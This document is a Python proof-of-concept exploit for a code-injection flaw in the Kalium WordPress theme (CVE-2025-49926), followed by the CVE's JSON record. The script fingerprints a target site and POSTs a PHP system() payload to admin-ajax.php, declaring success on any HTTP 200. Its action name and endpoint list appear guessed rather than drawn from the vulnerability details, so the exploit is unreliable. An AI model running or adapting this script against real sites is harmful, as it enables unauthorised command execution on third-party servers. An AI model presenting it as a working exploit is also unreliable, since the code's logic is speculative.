CVE-2025-49926

# CVE-2025-49926 - Kalium Theme Code Injection PoC # Exploit for Laborator Kalium WordPress Theme <= 3.25 # Author: Security Researcher import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" # Step 1: Verify the target is running Kalium theme def check_kalium_theme(url): print(f"[*] Checking if target is running Kalium theme...") try: resp = requests.get(url, timeout=10, verify=False) indicators = [ "kalium" in resp.text.lower(), "laborator" in resp.text.lower(), "/wp-content/themes/kalium/" in resp.text, "kalium" in resp.headers.get("Link", "").lower() ] if any(indicators): print("[+] Target is confirmed to be using Kalium theme") return True else: print("[-] Target does not appear to be using Kalium theme") return False except Exception as e: print(f"[-] Error checking theme: {e}") return False # Step 2: Identify vulnerable endpoint def find_vulnerable_endpoint(url): # Common endpoints in Kalium theme that may be vulnerable to code injection endpoints = [ "/wp-admin/admin-ajax.php", "/wp-content/themes/kalium/" ] print("[*] Probing for vulnerable endpoints...") return endpoints # Step 3: Craft and send the code injection payload def exploit_code_injection(url, endpoint): target = url.rstrip("/") + endpoint # Malicious payload for code injection (PHP code execution) payload = { "action": "kalium_ajax_action", "data": "<?php system('id; whoami; uname -a'); ?>" } print(f"[*] Sending code injection payload to: {target}") try: resp = requests.post(target, data=payload, timeout=15, verify=False) print(f"[*] Response Status: {resp.status_code}") if resp.status_code == 200: print("[+] Exploit sent successfully") print(f"[*] Response body (first 500 chars): {resp.text[:500]}") return resp.text except Exception as e: print(f"[-] Exploit failed: {e}") return None if __name__ == "__main__": print("=" * 60) print("CVE-2025-49926 - Kalium Theme Code Injection PoC") print("=" * 60) if check_kalium_theme(TARGET_URL): endpoints = find_vulnerable_endpoint(TARGET_URL) for ep in endpoints: result = exploit_code_injection(TARGET_URL, ep) if result: print("[!] Potential code execution achieved!") break else: print("[-] Target not vulnerable or not running Kalium theme")

{"cve": {"id": "CVE-2025-49926", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:38.583", "lastModified": "2026-04-27T20:16:18.060", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Generation of Code ('Code Injection') vulnerability in Laborator Kalium kalium allows Code Injection.This issue affects Kalium: from n/a through <= 3.25."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/kalium/vulnerability/wordpress-kalium-theme-3-25-arbitrary-code-execution-vulnerability?_s_id=cve", "source": "[email protected]"}]}}